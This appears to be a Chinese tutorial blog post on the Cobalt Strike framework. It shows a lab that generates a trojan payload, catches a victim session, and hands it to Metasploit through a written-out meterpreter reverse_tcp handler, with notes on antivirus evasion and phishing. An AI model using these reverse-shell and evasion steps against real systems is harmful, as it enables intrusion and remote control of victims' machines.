【Cobalt strike 渗透测试神器】

2023-11-05 09:10

本文主要是介绍【Cobalt strike 渗透测试神器】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

一、前言

安装包下载

主机详情

二、部分模块和Payload介绍

三、基本使用步骤

1. 服务端和客户端

2. 设置监听

四、配合其他工具反弹shell

1.  kali中使用msf

2.  CS创建监听

3. metasploit使用exploit 模块


一、前言

     Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具i并且在攻防测试团队协作方面堪称利器,因此广受黑客喜爱。Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但要想好玩的话,一定要架设在外网上

安装包下载

官网下载: ​​​​​https://www.cobaltstrike.com

博主资源免费下载:https://download.csdn.net/download/qq_55213436/85003580

主机详情

公网服务器:IP地址---:47.108.44.4       操作系统:Linux。

客户端:IP地址---:192.168.43.114        操作系统:Windows。

受害机:IP地址---:192.168. 175.146     操作系统:win7。

二、部分模块和Payload介绍

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

1-Cobalt Strike
New Connection 新建连接,支持连接多个服务器端
Preferences 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录
Visualization主要展示输出结果的视图
VPN Interfaces设置VPN接口
Listenrs  创建监听器
Script Manager脚本管理,可以通过AggressorScripts脚本来加强自身,可以扩展菜单栏,Beacon命令行,提权脚本
Close退出
2-View
Applications 显示受害主机的应用信息
Credentials  显示所有以获取的受害主机的凭证,如hashdump、Mimikatz
Downloads 查看已下载文件
Event Log 主机上线记录以及团队协作聊天记录
Keystrokes 查看键盘记录结果
Proxy Pivots  查看代理模块
Screenshots 查看所有屏幕截图
Script Console  加载第三方脚本以增强功能
Targets 显示所有受害主机

    

3-Package
HTML Application生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件
MS Office Macro生成office宏病毒文件
Payload Generator生成各种语言版本的payload
USB/CD AutoPlay生成利用自动播放运行的木马文件
Windows Dropper  捆绑器能够对任意的正常文件进行捆绑
Windows Executable生成可执行exe木马
Windows Executable(Stageless生成无状态的可执行exe木马

                                      

4-Reporting
Activity Report 活动报告
Hosts Report 主机报告
Indicators of Compromise  IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
Sessions Report  会话报告
Social Engineering Report   社会工程报告:包括鱼叉钓鱼邮件及点击记录
Tactics, Techniques, and Procedures   战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
Reset Data   重置数据
Export Data  导出数据,导出.tsv文件格式

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

三、基本使用步骤

1. 服务端和客户端

启动服务端

进入到CS的安装目录下,执行如下的操作:
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

客户端上线,打开CS的Windows客户端程序,即cobaltstrike.exe,后输入如下信息:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

成功连接上公网的CS服务器
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

2. 设置监听

创建监听器:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

3. 创建payload 

创建payload,等待目标主机上线。在本次演示实验中,关闭所有的杀毒软件和firewall。在实际的攻击过程中,我们肯定是要对payload做“免杀”来规避杀毒软件的检测,具体的免杀操作和规避杀毒软件的监测后续会有相应的介绍。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

 木马程序如下:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

运行对应的木马程序,则可以在CS的客户端返回对应的受害机的相关信息:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

拿到主机的权限后就可以执行后渗透操作:
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

其实我们可以结合其他的方式来增加攻击的隐蔽性和跨时空性。如:结合伪造邮件、嵌入到隐蔽的文件中。

四、配合其他工具反弹shell

此处以CS配合metasploit实现反弹shell,达到能够使用metasploit的相应工具实现对目标主机的渗透操作。(效果很棒!)

1.  kali中使用msf

──(root💀kali)-[~]
└─# msfconsole______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|=[ metasploit v6.1.14-dev                          ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn moremsf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name  Current Setting  Required  Description----  ---------------  --------  -----------Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST                      yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Wildcard Targetmsf6 exploit(multi/handler) > set lhost 47.108.217.53 
lhost => 47.108.217.53
msf6 exploit(multi/handler) > set lport 66
lport => 66
msf6 exploit(multi/handler) >  

2.  CS创建监听

    使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。(在下这儿截错图啦:下面的第一张图中HOST的IP地址应该为kali的IP地址!!!)

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

然后选择我们之前创建的:Windows/foreign/reverse_http选项,点击choose。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

3. metasploit使用exploit 模块

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

使用命令:输入shell命令后 ,进入dos界面,输入命令:chcp 65001即可解除乱码。

至此CS配合metasploit就成功啦。我们可以使用metasplit上的工具进行愉快的玩耍啦。

  (CS还有很多非常棒的功能:如构建隧道等后期还应该加强对其学习和深入利用。)

这篇关于【Cobalt strike 渗透测试神器】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/348816

相关文章

性能测试介绍

性能测试是一种测试方法,旨在评估系统、应用程序或组件在现实场景中的性能表现和可靠性。它通常用于衡量系统在不同负载条件下的响应时间、吞吐量、资源利用率、稳定性和可扩展性等关键指标。 为什么要进行性能测试 通过性能测试,可以确定系统是否能够满足预期的性能要求,找出性能瓶颈和潜在的问题,并进行优化和调整。 发现性能瓶颈:性能测试可以帮助发现系统的性能瓶颈,即系统在高负载或高并发情况下可能出现的问题

字节面试 | 如何测试RocketMQ、RocketMQ?

字节面试:RocketMQ是怎么测试的呢? 答: 首先保证消息的消费正确、设计逆向用例,在验证消息内容为空等情况时的消费正确性; 推送大批量MQ,通过Admin控制台查看MQ消费的情况,是否出现消费假死、TPS是否正常等等问题。(上述都是临场发挥,但是RocketMQ真正的测试点,还真的需要探讨) 01 先了解RocketMQ 作为测试也是要简单了解RocketMQ。简单来说,就是一个分

【测试】输入正确用户名和密码,点击登录没有响应的可能性原因

目录 一、前端问题 1. 界面交互问题 2. 输入数据校验问题 二、网络问题 1. 网络连接中断 2. 代理设置问题 三、后端问题 1. 服务器故障 2. 数据库问题 3. 权限问题: 四、其他问题 1. 缓存问题 2. 第三方服务问题 3. 配置问题 一、前端问题 1. 界面交互问题 登录按钮的点击事件未正确绑定,导致点击后无法触发登录操作。 页面可能存在

业务中14个需要进行A/B测试的时刻[信息图]

在本指南中,我们将全面了解有关 A/B测试 的所有内容。 我们将介绍不同类型的A/B测试,如何有效地规划和启动测试,如何评估测试是否成功,您应该关注哪些指标,多年来我们发现的常见错误等等。 什么是A/B测试? A/B测试(有时称为“分割测试”)是一种实验类型,其中您创建两种或多种内容变体——如登录页面、电子邮件或广告——并将它们显示给不同的受众群体,以查看哪一种效果最好。 本质上,A/B测

Verybot之OpenCV应用一:安装与图像采集测试

在Verybot上安装OpenCV是很简单的,只需要执行:         sudo apt-get update         sudo apt-get install libopencv-dev         sudo apt-get install python-opencv         下面就对安装好的OpenCV进行一下测试,编写一个通过USB摄像头采

BIRT 报表的自动化测试

来源:http://www.ibm.com/developerworks/cn/opensource/os-cn-ecl-birttest/如何为 BIRT 报表编写自动化测试用例 BIRT 是一项很受欢迎的报表制作工具,但目前对其的测试还是以人工测试为主。本文介绍了如何对 BIRT 报表进行自动化测试,以及在实际项目中的一些测试实践,从而提高了测试的效率和准确性 -------

可测试,可维护,可移植:上位机软件分层设计的重要性

互联网中,软件工程师岗位会分前端工程师,后端工程师。这是由于互联网软件规模庞大,从业人员众多。前后端分别根据各自需求发展不一样的技术栈。那么上位机软件呢?它规模小,通常一个人就能开发一个项目。它还有必要分前后端吗? 有必要。本文从三个方面论述。分别是可测试,可维护,可移植。 可测试 软件黑盒测试更普遍,但很难覆盖所有应用场景。于是有了接口测试、模块化测试以及单元测试。都是通过降低测试对象

day45-测试平台搭建之前端vue学习-基础4

目录 一、生命周期         1.1.概念         1.2.常用的生命周期钩子         1.3.关于销毁Vue实例         1.4.原理​编辑         1.5.代码 二、非单文件组件         2.1.组件         2.2.使用组件的三大步骤         2.3.注意点         2.4.关于VueComponen

以后写代码都是AI自动写了,Cursor+Claude-3.5-Sonnet,Karpathy 点赞的 AI 代码神器。如何使用详细教程

Cursor 情况简介 AI 大神 Andrej Karpathy 都被震惊了!他最近在试用 VS Code Cursor +Claude Sonnet 3.5,结果发现这玩意儿比 GitHub Copilot 还好用! Cursor 在短短时间内迅速成为程序员群体的顶流神器,其背后的原因在于其默认使用 OpenAI 投资的 Claude-3.5-Sonnet 模型,这一举动不仅改变了代码生成

如何成为一个优秀的测试工程师

链接地址:http://blog.csdn.net/KerryZhu/article/details/5250504 我一直在想,如何将自己的测试团队打造成世界一流的团队?流程、测试自动化、创新、扁平式管理、国际标准制定、测试社区贡献、…… 但首先一点是明确的,就是要将每一个测试工程师打造成优秀的测试工程师,优秀的团队必须由优秀的成员构成。所以,先讨论“如何成为一个优秀的测试工程师”,